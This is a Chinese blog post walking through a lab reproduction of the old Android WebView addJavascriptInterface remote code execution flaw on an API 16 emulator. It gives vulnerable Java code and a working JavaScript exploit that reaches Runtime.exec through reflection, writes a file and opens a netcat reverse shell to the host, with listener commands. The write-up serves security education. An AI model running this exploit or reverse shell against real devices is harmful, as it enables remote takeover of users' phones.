Android Webview 漏洞复现

最新推荐文章于 2024-04-14 04:45:13 发布
最新推荐文章于 2024-04-14 04:45:13 发布
阅读量909 收藏 4
点赞数
分类专栏: Android 文章标签: android web app
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44650391/article/details/110482183
版权

Android Webview 漏洞复现

前言

Android API level 16以及之前的版本存在远程代码执行安全漏洞。该漏洞源于程序没有正确限制使用WebView.addJavascriptInterface方法,远程攻击者可通过使用Java Reflection API利用该漏洞执行任意Java对象的方法。

总结起来说,就是通过addJavascriptInterface给WebView加入一个JavaScript桥接接口,JavaScript通过调用这个接口可以直接操作本地的JAVA接口。

触发条件

  • 使用addJavascriptInterface方法注册可供JavaScript调用的Java对象;
  • 使用WebView加载外部网页或者本地网页;
  • Android系统版本低于4.2(Android API level 小于17);

漏洞原理

JS调用Android中对象其中一个方式是通过addJavascriptInterface接口进行对象映射:

webView.addJavascriptInterface(new JsObject(), "injectObject");
// 参数1:Android的本地对象
// 参数2:JS的对象
// 通过对象映射将Android中的本地对象和JS中的对象进行关联,从而实现JS调用Android的对象和方法

漏洞产生的根本原因
当JS拿到Android这个对象后,就可以调用这个Android对象中所有的方法,包括系统类(java.lang.Runtime 类),从而进行任意代码执行

漏洞复现

1. 运行环境

编辑器:Android Studio 4.0.1
AVD:Android 4.1 API 16 (X86)

2.1 webview介绍

WebView可以简单的理解为一个展示Web页面的界面,同时提供了一些简单的交互功能。在android<4.4中的WebView是基于Webkit实现的。其基本用法如下:

首先在配置文件中添加WebView控件:

<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"  
android:layout_width="match_parent"  
android:layout_height="match_parent" >  
<WebView  
android:id="@+id/web_view"  
android:layout_width="match_parent"  
android:layout_height="match_parent" />  
</LinearLayout>

在Activity中就可以直接使用了:

 @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        webView = (WebView) findViewById(R.id.web_view);
        webView.getSettings().setJavaScriptEnabled(true);
        webView.loadUrl("http://www.baidu.com");
    }

2.2 漏洞核心代码

在我们的客户端,如果开发人员不严谨,就会使用带有漏洞的代码:

class JsObejct{
    @javascriptInterface
    public String toString(){
        return  "injectedObject";
    }
}
 
webView.addJavascriptInterface(new JsObject(), "injectObject"); //新建JsObject,并注入到js的injectObject字符串中
webView.loadData("", "text/html", null);
webView.loadUrl("javascript:alert(injectedObject.toString())"); //webView中访问执行js代码,js中调用injectObject字符串的toString方法,
                                                                // 在后台代码中会被映射到JsObject对象的toString方法。

产生漏洞的原因是 webView.addJavascriptInterface(new JsObject(), “injectObject”); 使得服务端的js代码可以通过 java反射机制 任意获取到客户端对象的方法。

2.3 JS攻击核心代码

function execute(cmdArgs) {
    // 步骤1:遍历 window 对象
    // 目的是为了找到包含 getClass ()的对象
    // 因为Android映射的JS对象也在window中,所以肯定会遍历到
    for (var obj in window) {
        console.log(obj);
        if ("getClass" in window[obj]) {
        // 步骤2:利用反射调用forName()得到Runtime类对象
            alert(obj);
            return  window[obj].getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
        }
    }
}

具体获取系统类的描述:(结合 Java 反射机制)

  • Android中的对象有一公共的方法:getClass() ;
  • 该方法可以获取到当前类 类型Class
  • 该类有一关键的方法: Class.forName;
  • 该方法可以加载一个类(可加载 java.lang.Runtime 类)
  • 而该类是可以执行本地命令的

2.4 效果展示

利用漏洞反弹shell:

  • 首先利用netcat在本机监听6666 8888端口:
  • 进入nc.exe目录,开启2个CMD分别执行:
    nc -vv -l -p 6666
    nc -vv -l -p 8888

反弹shell的JS代码如下

<script>

function execute(cmdArgs)
{
    for (var obj in window) {
        console.log(obj);
        if ("getClass" in window[obj]) {
        // 步骤2:利用反射调用forName()得到Runtime类对象
            alert(obj);
            return  window[obj].getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
        }
    }
}

execute(["/system/bin/sh", "-c", "echo 'Hello my great world' > /sdcard/csdn.txt"]);
execute(["/system/bin/sh","-c","nc 10.0.2.2 8888|/system/bin/sh|nc 10.0.2.2 6666"]);
// 这里的IP地址是主机地址 在安卓中的localhost是10.0.2.2 端口随意设置为空闲的就行

</script>

在上面的JS攻击代码中 execute函数做了两件事情:

  • 在Android端写入了 “Hello my great world” 保存在设备的 /sdcard/csdn.txt
  • 反弹了一个 shellnetcat 监控端口
    在这里插入图片描述
    在这里插入图片描述
    成功反弹shell在netcat上,下面测试一下:
    在这里插入图片描述
    我们刚刚在 /sdcard/csdn.txt保存了它,看一看:
    在这里插入图片描述
    打印输出确实如我们第一个execute写入的一致!

总结

webview所带来的漏洞不仅仅如此,在使用过程中存在许多漏洞,容易造成用户数据泄露等等危险,而很多人往往会忽视这个问题。其他方面的问题可以引用一位大佬的图来说明:
在这里插入图片描述
所以应该养成良好的写代码习惯。

往事散云烟
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Android 10 WebView 踩坑实录
云水木石
03-05 3721
项目要求支持 8K 高清视频(H265编码)播放,拿到板子后却发现使用 App 可以播放 8K 高清视频,但使用浏览器却不行,即使安装上最新的 Chrome for Android 也不行。根据以往的浏览器内核开发经验,在 Android 平台上,Chromium WebView 最终是调用系统框架层的 MediaPlayer 进行播放。理论上只要系统框架层能够支持 8K 高清播放,那么浏览器应该...
Android WebView漏洞总结
Venscor技术养成之路
01-08 2128
2015年就了解了这个漏洞,但只是简单的试了一下,时间一久就忘记了。导致16年无任何准备的条件下,给面试官讲这个漏洞都讲不清楚,丢人。最近学习了一下web安全相关的知识,就顺便在看了一下这个老的Webview漏洞。全程几乎没有什么干货,就当做个记录。一、几个老的CVE  CVE-2012-6336:WebView RCE漏洞原型,对于使用了Webview API:addJavaScriptInter
WebView远程代码执行漏洞学习并复现
九天
04-01 7666
一 前言 Android API level 16以及之前的版本存在远程代码执行安全漏洞,该漏洞源于程序没有正确限制使用WebView.addJavascriptInterface方法,远程攻击者可通过使用Java Reflection API利用该漏洞执行任意Java对象的方法,简单的说就是通过addJavascriptInterfaceWebView加入一个JavaScript桥接
webView远程代码执行漏洞复现
YenKoc的博客
08-31 69
一.概述 这个漏洞只存在于Android API level 16以及之前的版本,系统没有限制使用webView.addJavascriptInterface方法,导致攻击者可以通过使用java 反射API利用该漏洞执行任意java对象的方法,也就是通过addJavascriptInterfaceWebView加入一个JavaScript桥接接口,JavaScirpt通过调用这个接口可以直接操...
漏洞复现】2,2024年最新手把手教你5G时代Webview的正确使用姿势
最新发布
2401_83739529的博客
04-14 868
log4j2是apache下的java应用常见的开源日志库,是一个Java的日志记录工具。在log4j框架的基础上进行了改进,并引入了丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。JNDI,全称为Java命名和目录接口(Java Naming and Directory Interface),是SUN公司提供的一种标准的Java命名系统接口,允许从指定的远程服务器获取并加载对象。
WebView常见漏洞修复
coder0408的专栏
01-05 659
一、WebView中,主要漏洞有三类 任意代码执行漏洞 密码明文存储漏洞 域控制不严格漏洞 二、具体分析 2.1 WebView任意代码执行漏洞 出现该漏洞的三个: WebViewaddJavascriptInterface()接口 WebView 内置导出的 searchBoxJavaBridge_对象 WebView 内置导出的 accessibility 和 accessibilit...
Android9.0 升级webview方法-仅备忘
glunoy的专栏
03-29 9363
1.下载对应需要的webview内核 https://www.apkmirror.com/apk/google-inc/android-system-webview/ 优先下载稳定版。 beta版本还是算了。2021.3.29本人委托同事翻墙下载的版本为89.0.4389.90。看新闻说优化了不少东西。不知道有没有bug先用上。 2.替换源码下面的webview.apk。 方法是搜索find . -name webview.apk. 定位到external\chromium-webview\prebui
Android WebView.apk 浏览器内核 com.android.webview
12-15
Android 原生浏览器内核,包名 com.android.webview,内核版本116。 适用版本:Android API 24 及以上版本。 com.android.webview_116.0.5845.163-minAPI24.apk
Android webview加载网页.zip
04-17
Android开发中,WebView是一个非常重要的组件,它允许我们在应用程序内部加载和显示网页内容,无需跳转到外部浏览器。这个“Android webview加载网页.zip”文件可能包含了一个示例项目或者教程,帮助开发者理解...
Android Webview重定向问题解决方法
08-27
Android开发过程中,使用过WebView的童鞋可能难免会遇到URL重定向问题。这篇文章主要介绍了Android Webview重定向问题解决方法,非常具有实用价值,需要的朋友可以参考下
关于AndroidWebView远程代码执行漏洞浅析
08-27
主要给大家介绍了关于AndroidWebView远程代码执行漏洞的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
android webview input=file 失效解决方案
05-24
Android开发中,Webview是一个重要的组件,它允许我们在原生应用中内嵌网页内容,提供混合式应用的用户体验。然而,在使用Webview时,有时会遇到一个问题:当HTML页面中包含`<input type="file">`用于上传文件的...
android web安全问题,Android WebView常见的安全漏洞和解决方案
weixin_29184371的博客
05-26 896
概述WebView中安全漏洞有三种,分别是:远程代码执行漏洞密码明文存储漏洞域控制不严格漏洞下面依次分析各漏洞产生的原因以及解决方案一、远程代码执行漏洞1、WbView中addJavascriptInterface()接口产生原因:Android API level 17以及之前的系统版本,由于程序没有正确限制使用addJavascriptInterface方法,远程攻击者可通过使用Java Re...
electron开发跨多平台Mac、Windows 和 Linux的桌面应用之webview标签和shell模块(四)
斗师——Ace
11-18 743
参考文档:https://electronjs.org/docs/api/webview-tag. 1. 在一些旧的eletron版本的中需要在主进程中引入webviewTag=true属性,才会显示webview标签。 win = new BrowserWindow({ width: 800, height: 600, webPreferences: { ...
android安全之webview远程代码执行漏洞
pangjl1982的专栏
04-11 1530
【基础知识】     WebviewAndroid用于浏览网页的组件,它的接口函数addJavascriptInterface可以实现网页JS与本地JAVA的交互,但是没有限制已注册JAVA类的方法调用,导致可以利用反射机制调用未注册的其它任何JAVA类。     当Android用户访问恶意网页时,会被迫执行系统命令,如安装木马、盗取敏感数据等。   【漏洞重现】
应用克隆漏洞原理分析
键盘的起始页
06-29 958
0x01 前言 最近由于公司的需求,需要检测一下webview的跨域漏洞,也就是前几个月很火的支付宝应用克隆事件的漏洞,所以需要了解并复现相关的漏洞, 该漏洞是由腾讯的玄武实验室发现的,支付宝克隆事件的具体发生场景如下: 用户在接收一条短信后,点开其中的链接,自动打开支付宝的webview组件,并加载相关的链接,之后跳到的界面是攻击者进行设置的抽奖界面,但是这个时候,对方的手机已经克隆了用户的支付宝,并可以正常使用二维码和小额转账等功能。 其实整个漏洞的关键所在是支付宝口令红包的业务需求,打开了webv
android webview localStorage
03-08
Android WebView是一个用于在Android应用程序中显示Web内容的组件。它可以加载网页并提供与网页交互的功能。而localStorage是Web浏览器提供的一种存储机制,用于在浏览器中存储数据。 在Android WebView中,可以通过以下步骤来使用localStorage: 1. 启用JavaScript:在WebView中启用JavaScript,因为localStorage是通过JavaScript来操作的。可以通过以下代码实现: ```java webView.getSettings().setJavaScriptEnabled(true); ``` 2. 设置WebChromeClient:为了能够使用localStorage,需要设置一个WebChromeClient,并重写onExceededDatabaseQuota方法。可以通过以下代码实现: ```java webView.setWebChromeClient(new WebChromeClient() { @Override public void onExceededDatabaseQuota(String url, String databaseIdentifier, long currentQuota, long estimatedSize, long totalUsedQuota, WebStorage.QuotaUpdater quotaUpdater) { quotaUpdater.updateQuota(estimatedSize * 2); } }); ``` 3. 使用localStorage:一旦WebView启用了JavaScript并设置了WebChromeClient,就可以在JavaScript中使用localStorage了。可以通过以下代码示例来存储和获取数据: ```javascript // 存储数据 localStorage.setItem("key", "value"); // 获取数据 var value = localStorage.getItem("key"); ``` 以上就是在Android WebView中使用localStorage的简要介绍。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值